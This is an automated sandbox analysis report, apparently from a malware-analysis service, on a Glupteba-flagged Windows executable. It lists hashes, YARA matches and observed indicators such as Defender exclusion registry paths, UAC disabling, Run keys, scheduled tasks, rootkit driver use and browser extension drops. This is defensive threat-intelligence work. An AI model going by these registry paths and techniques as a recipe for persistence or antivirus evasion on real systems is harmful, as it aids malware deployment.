Analysis
-
max time kernel
299s -
max time network
300s -
platform
windows10-1703_x64 -
resource
win10-20231215-en -
resource tags
arch:x64arch:x86image:win10-20231215-enlocale:en-usos:windows10-1703-x64system -
submitted
04-02-2024 03:55
Static task
static1
Behavioral task
behavioral1
Sample
bd499108bc5684a3c356097facf9783a8f2331f63d7749363bb6c739ccc9c248.exe
Resource
win7-20231129-en
General
-
Target
bd499108bc5684a3c356097facf9783a8f2331f63d7749363bb6c739ccc9c248.exe
-
Size
1.4MB
-
MD5
eba840631908d1b6510df1ad7e64d5ce
-
SHA1
47f8ba9971bd484a48e4960f0fc7bd9f3643232a
-
SHA256
bd499108bc5684a3c356097facf9783a8f2331f63d7749363bb6c739ccc9c248
-
SHA512
a4e711746b78a233ebf91fa7735695f1b17acf4b4296248aea0b39c78a51837d0c3617b0fbf89a6a9466c10fed4412fa34109b6957bcfca3d64cc5a4374555a2
-
SSDEEP
24576:k0aJxn2Juo1nylyUK3TkosLHCzKyewLms4xuyEuUV21ACcmFkzeyl6KtkGuTWn6f:VWxn2Ju8EK3TkosLGZewLmsYErU6Z/la
Malware Config
Signatures
-
Glupteba payload 23 IoCs
resource yara_rule behavioral2/memory/3096-60-0x0000000002E10000-0x00000000036FB000-memory.dmp family_glupteba behavioral2/memory/3096-64-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba behavioral2/memory/2080-66-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba behavioral2/memory/3096-149-0x0000000002E10000-0x00000000036FB000-memory.dmp family_glupteba behavioral2/memory/3096-170-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba behavioral2/memory/3096-411-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba behavioral2/memory/2080-415-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba behavioral2/memory/2080-444-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba behavioral2/memory/3096-1000-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba behavioral2/memory/2080-1001-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba behavioral2/memory/2080-1053-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba behavioral2/memory/3096-1062-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba behavioral2/memory/3492-1491-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba behavioral2/memory/4484-2071-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba behavioral2/memory/3492-2072-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba behavioral2/memory/4484-2126-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba behavioral2/memory/3492-2139-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba behavioral2/memory/3492-2643-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba behavioral2/memory/4484-2650-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba behavioral2/memory/4484-2653-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba behavioral2/memory/4916-3398-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba behavioral2/memory/4916-3411-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba behavioral2/memory/4916-3421-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" bd499108bc5684a3c356097facf9783a8f2331f63d7749363bb6c739ccc9c248.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\bd499108bc5684a3c356097facf9783a8f2331f63d7749363bb6c739ccc9c248.exe = "0" bd499108bc5684a3c356097facf9783a8f2331f63d7749363bb6c739ccc9c248.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" BouWt3YTgZwreWLACxTGkzJz.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" BouWt3YTgZwreWLACxTGkzJz.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" BouWt3YTgZwreWLACxTGkzJz.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" BouWt3YTgZwreWLACxTGkzJz.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths bd499108bc5684a3c356097facf9783a8f2331f63d7749363bb6c739ccc9c248.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" BouWt3YTgZwreWLACxTGkzJz.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" BouWt3YTgZwreWLACxTGkzJz.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\BouWt3YTgZwreWLACxTGkzJz.exe = "0" BouWt3YTgZwreWLACxTGkzJz.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\bdPw0hu74RQXo05YdiloFcXR.exe = "0" bdPw0hu74RQXo05YdiloFcXR.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 121 860 rundll32.exe -
Downloads MZ/PE file
-
Modifies Windows Firewall 2 TTPs 2 IoCs
pid Process 2812 netsh.exe 32 netsh.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-721438792-2341338383-2410509276-1000\Control Panel\International\Geo\Nation WvvqjhM.exe -
Drops startup file 8 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\eEw7mhzWP4kemLml1jPwIjuX.bat CasPol.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\jBUvuTVFsPIfA1MZgsnMT81t.bat CasPol.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hnJfpuIMe433bjTsDLh2mEbD.bat CasPol.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\QIZDdx89F7Qi90A2tyMivt3H.bat CasPol.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\yzcroVBYrJOWwd0r3HiUmKDQ.bat CasPol.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OnDJC2pZICixiBE6hBI1mbIn.bat CasPol.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\aOV3JXjU3HoGa8FLDEeb0RJ7.bat CasPol.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\aXlh1hCSZGyt8uywxLfCqHLo.bat CasPol.exe -
Executes dropped EXE 25 IoCs
pid Process 3096 BouWt3YTgZwreWLACxTGkzJz.exe 2080 bdPw0hu74RQXo05YdiloFcXR.exe 3828 ModJdN8jNVnymd9XGEFiFx7U.exe 3788 iNiYbTHs1Lq4Du24QcHKlJFg.exe 2260 iNiYbTHs1Lq4Du24QcHKlJFg.exe 212 ftIGodt38l1A0el3gsSuEKzA.exe 4380 ModJdN8jNVnymd9XGEFiFx7U.tmp 316 iNiYbTHs1Lq4Du24QcHKlJFg.exe 3980 iNiYbTHs1Lq4Du24QcHKlJFg.exe 924 iNiYbTHs1Lq4Du24QcHKlJFg.exe 2320 7nbYV20XbAUjbnnHzTZl4oOU.exe 2060 Install.exe 2756 Install.exe 1544 UYUnAyqE2cpLDpQgWoHzWPCg.exe 4484 bdPw0hu74RQXo05YdiloFcXR.exe 3492 BouWt3YTgZwreWLACxTGkzJz.exe 3524 Assistant_106.0.4998.16_Setup.exe_sfx.exe 3516 assistant_installer.exe 4552 assistant_installer.exe 4916 csrss.exe 3908 injector.exe 3168 windefender.exe 4840 windefender.exe 4664 HbyLpiR.exe 2552 WvvqjhM.exe -
Loads dropped DLL 10 IoCs
pid Process 3788 iNiYbTHs1Lq4Du24QcHKlJFg.exe 2260 iNiYbTHs1Lq4Du24QcHKlJFg.exe 316 iNiYbTHs1Lq4Du24QcHKlJFg.exe 3980 iNiYbTHs1Lq4Du24QcHKlJFg.exe 924 iNiYbTHs1Lq4Du24QcHKlJFg.exe 3516 assistant_installer.exe 3516 assistant_installer.exe 4552 assistant_installer.exe 4552 assistant_installer.exe 860 rundll32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral2/files/0x000600000001abe4-92.dat upx behavioral2/files/0x000600000001abe4-108.dat upx behavioral2/files/0x000600000001abe4-106.dat upx behavioral2/files/0x000600000001abe4-119.dat upx behavioral2/memory/3788-125-0x0000000000080000-0x0000000000568000-memory.dmp upx behavioral2/files/0x000600000001abf8-127.dat upx behavioral2/memory/2260-138-0x0000000000080000-0x0000000000568000-memory.dmp upx behavioral2/files/0x000600000001abe4-139.dat upx behavioral2/memory/316-132-0x0000000000CB0000-0x0000000001198000-memory.dmp upx behavioral2/files/0x000600000001abe4-152.dat upx behavioral2/memory/924-155-0x0000000000080000-0x0000000000568000-memory.dmp upx behavioral2/memory/3980-151-0x0000000000080000-0x0000000000568000-memory.dmp upx behavioral2/memory/924-557-0x0000000000080000-0x0000000000568000-memory.dmp upx behavioral2/files/0x0009000000000649-3410.dat upx behavioral2/memory/3168-3416-0x0000000000400000-0x00000000008DF000-memory.dmp upx -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" BouWt3YTgZwreWLACxTGkzJz.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\BouWt3YTgZwreWLACxTGkzJz.exe = "0" BouWt3YTgZwreWLACxTGkzJz.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\bdPw0hu74RQXo05YdiloFcXR.exe = "0" bdPw0hu74RQXo05YdiloFcXR.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions bd499108bc5684a3c356097facf9783a8f2331f63d7749363bb6c739ccc9c248.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\bd499108bc5684a3c356097facf9783a8f2331f63d7749363bb6c739ccc9c248.exe = "0" bd499108bc5684a3c356097facf9783a8f2331f63d7749363bb6c739ccc9c248.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" BouWt3YTgZwreWLACxTGkzJz.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" BouWt3YTgZwreWLACxTGkzJz.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths bd499108bc5684a3c356097facf9783a8f2331f63d7749363bb6c739ccc9c248.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" BouWt3YTgZwreWLACxTGkzJz.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" BouWt3YTgZwreWLACxTGkzJz.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" BouWt3YTgZwreWLACxTGkzJz.exe -
Adds Run key to start application 2 TTPs 3 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-721438792-2341338383-2410509276-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" BouWt3YTgZwreWLACxTGkzJz.exe Set value (str) \REGISTRY\USER\S-1-5-21-721438792-2341338383-2410509276-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" bdPw0hu74RQXo05YdiloFcXR.exe Set value (str) \REGISTRY\USER\S-1-5-21-721438792-2341338383-2410509276-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" csrss.exe -
Checks for any installed AV software in registry 1 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\Avast Software\Avast Install.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA bd499108bc5684a3c356097facf9783a8f2331f63d7749363bb6c739ccc9c248.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" bd499108bc5684a3c356097facf9783a8f2331f63d7749363bb6c739ccc9c248.exe -
Drops Chrome extension 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json WvvqjhM.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json WvvqjhM.exe -
Drops desktop.ini file(s) 1 IoCs
description ioc Process File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini WvvqjhM.exe -
Enumerates connected drives 3 TTPs 4 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\D: iNiYbTHs1Lq4Du24QcHKlJFg.exe File opened (read-only) \??\F: iNiYbTHs1Lq4Du24QcHKlJFg.exe File opened (read-only) \??\D: iNiYbTHs1Lq4Du24QcHKlJFg.exe File opened (read-only) \??\F: iNiYbTHs1Lq4Du24QcHKlJFg.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 1 pastebin.com 3 pastebin.com -
Manipulates WinMonFS driver. 1 IoCs
Roottkits write to WinMonFS to hide directories/files from being detected.
description ioc Process File opened for modification \??\WinMonFS csrss.exe -
Drops file in System32 directory 40 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive reg.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 WvvqjhM.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 WvvqjhM.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 WvvqjhM.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive WerFault.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat WvvqjhM.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\D4579ED561AFE0AD26F688A8C9A41CC6 WvvqjhM.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA WvvqjhM.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA WvvqjhM.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol WvvqjhM.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E87CE99F124623F95572A696C80EFCAF_5715DE550AA680C2FBA40D3A4F6608E9 WvvqjhM.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini HbyLpiR.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache WvvqjhM.exe File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol HbyLpiR.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies WvvqjhM.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft WvvqjhM.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content WvvqjhM.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_8CFD0F060456F65ABC9E95E41A1F781C WvvqjhM.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E87CE99F124623F95572A696C80EFCAF_5715DE550AA680C2FBA40D3A4F6608E9 WvvqjhM.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive Conhost.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData WvvqjhM.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA WvvqjhM.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 WvvqjhM.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E87CE99F124623F95572A696C80EFCAF_D50E9269859FFB5A738F673D82E63752 WvvqjhM.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E87CE99F124623F95572A696C80EFCAF_D50E9269859FFB5A738F673D82E63752 WvvqjhM.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log reg.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive reg.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_8CFD0F060456F65ABC9E95E41A1F781C WvvqjhM.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat rundll32.exe File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive reg.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive schtasks.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE WvvqjhM.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\D4579ED561AFE0AD26F688A8C9A41CC6 WvvqjhM.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA WvvqjhM.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 4252 set thread context of 4676 4252 bd499108bc5684a3c356097facf9783a8f2331f63d7749363bb6c739ccc9c248.exe 75 -
Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 2 IoCs
Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.
description ioc Process File opened (read-only) \??\VBoxMiniRdrDN BouWt3YTgZwreWLACxTGkzJz.exe File opened (read-only) \??\VBoxMiniRdrDN bdPw0hu74RQXo05YdiloFcXR.exe -
Drops file in Program Files directory 14 IoCs
description ioc Process File created C:\Program Files (x86)\FohpjzYDshfCC\skRIrpI.xml WvvqjhM.exe File created C:\Program Files (x86)\KCGdmeQdU\qzQQpMr.xml WvvqjhM.exe File created C:\Program Files (x86)\bYkzgWxJAWlLeHAUHjR\NobKjPD.dll WvvqjhM.exe File created C:\Program Files (x86)\hgFvgKbJayUn\KztjKeb.dll WvvqjhM.exe File created C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi WvvqjhM.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak WvvqjhM.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja WvvqjhM.exe File created C:\Program Files (x86)\bYkzgWxJAWlLeHAUHjR\UqwNxxt.xml WvvqjhM.exe File created C:\Program Files (x86)\FohpjzYDshfCC\yjcZUoh.dll WvvqjhM.exe File created C:\Program Files (x86)\KCGdmeQdU\tQIJpO.dll WvvqjhM.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi WvvqjhM.exe File created C:\Program Files (x86)\IoHaAJhEDYhU2\fqhmiWI.xml WvvqjhM.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak WvvqjhM.exe File created C:\Program Files (x86)\IoHaAJhEDYhU2\CtiQKIPJqpfOS.dll WvvqjhM.exe -
Drops file in Windows directory 13 IoCs
description ioc Process File created C:\Windows\Tasks\SMPpzaSdDqsJvHF.job schtasks.exe File opened for modification C:\Windows\unins000.dat ModJdN8jNVnymd9XGEFiFx7U.tmp File created C:\Windows\Tasks\bwKBwqZYjkqxftWshF.job reg.exe File opened for modification C:\Windows\rss bdPw0hu74RQXo05YdiloFcXR.exe File created C:\Windows\Tasks\YsLxjqvMZrWymyIEG.job schtasks.exe File opened for modification C:\Windows\rss BouWt3YTgZwreWLACxTGkzJz.exe File created C:\Windows\rss\csrss.exe BouWt3YTgZwreWLACxTGkzJz.exe File created C:\Windows\rss\csrss.exe bdPw0hu74RQXo05YdiloFcXR.exe File created C:\Windows\unins000.dat ModJdN8jNVnymd9XGEFiFx7U.tmp File created C:\Windows\is-6VUN0.tmp ModJdN8jNVnymd9XGEFiFx7U.tmp File created C:\Windows\windefender.exe csrss.exe File opened for modification C:\Windows\windefender.exe csrss.exe File created C:\Windows\Tasks\EtrQGzrpWMpnyWxNE.job schtasks.exe -
Launches sc.exe 1 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 2484 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 64 IoCs
pid pid_target Process procid_target 2116 3096 WerFault.exe 76 2120 2080 WerFault.exe 77 2100 3096 WerFault.exe 76 660 2080 WerFault.exe 77 4384 2080 WerFault.exe 77 1136 3096 WerFault.exe 76 4736 2080 WerFault.exe 77 3344 3096 WerFault.exe 76 2248 2080 WerFault.exe 77 1428 3096 WerFault.exe 76 4916 2080 WerFault.exe 77 4632 3096 WerFault.exe 76 4836 3096 WerFault.exe 76 2116 2080 WerFault.exe 77 2564 3096 WerFault.exe 76 5112 2080 WerFault.exe 77 4792 2080 WerFault.exe 77 192 3096 WerFault.exe 76 1300 3096 WerFault.exe 76 2608 2080 WerFault.exe 77 2060 3096 WerFault.exe 76 672 2080 WerFault.exe 77 4736 2080 WerFault.exe 77 3344 3096 WerFault.exe 76 2108 3096 WerFault.exe 76 2636 2080 WerFault.exe 77 1568 3096 WerFault.exe 76 2548 2080 WerFault.exe 77 3008 3096 WerFault.exe 76 2136 2080 WerFault.exe 77 1004 3096 WerFault.exe 76 4616 2080 WerFault.exe 77 3224 3096 WerFault.exe 76 1296 2080 WerFault.exe 77 3168 2080 WerFault.exe 77 4104 3096 WerFault.exe 76 2780 3096 WerFault.exe 76 2236 2080 WerFault.exe 77 3660 4484 WerFault.exe 157 2780 4484 WerFault.exe 157 4656 4484 WerFault.exe 157 4972 3492 WerFault.exe 159 4876 3492 WerFault.exe 159 3688 4484 WerFault.exe 157 60 3492 WerFault.exe 159 5100 4484 WerFault.exe 157 2692 3492 WerFault.exe 159 208 3492 WerFault.exe 159 2312 4484 WerFault.exe 157 1940 4484 WerFault.exe 157 4132 3492 WerFault.exe 159 32 3492 WerFault.exe 159 504 4484 WerFault.exe 157 4768 3492 WerFault.exe 159 1396 3492 WerFault.exe 159 428 4484 WerFault.exe 157 800 4916 WerFault.exe 202 2484 4484 WerFault.exe 157 3352 4916 WerFault.exe 202 3116 4916 WerFault.exe 202 5000 4916 WerFault.exe 202 2536 4484 WerFault.exe 157 4744 4916 WerFault.exe 202 644 4916 WerFault.exe 202 -
Creates scheduled task(s) 1 TTPs 13 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3364 schtasks.exe 2700 schtasks.exe 2640 schtasks.exe 3352 schtasks.exe 4396 schtasks.exe 3744 schtasks.exe 2188 schtasks.exe 424 schtasks.exe 2212 schtasks.exe 3464 schtasks.exe 4972 schtasks.exe 4040 schtasks.exe 220 schtasks.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" reg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs schtasks.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2531 = "Chatham Islands Daylight Time" bdPw0hu74RQXo05YdiloFcXR.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1842 = "Russia TZ 4 Standard Time" bdPw0hu74RQXo05YdiloFcXR.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" reg.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-291 = "Central European Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-2062 = "North Korea Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2391 = "Aleutian Daylight Time" bdPw0hu74RQXo05YdiloFcXR.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-401 = "Arabic Daylight Time" bdPw0hu74RQXo05YdiloFcXR.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA schtasks.exe Key created \REGISTRY\USER\.DEFAULT\SYSTEM netsh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs reg.exe Set value (str) 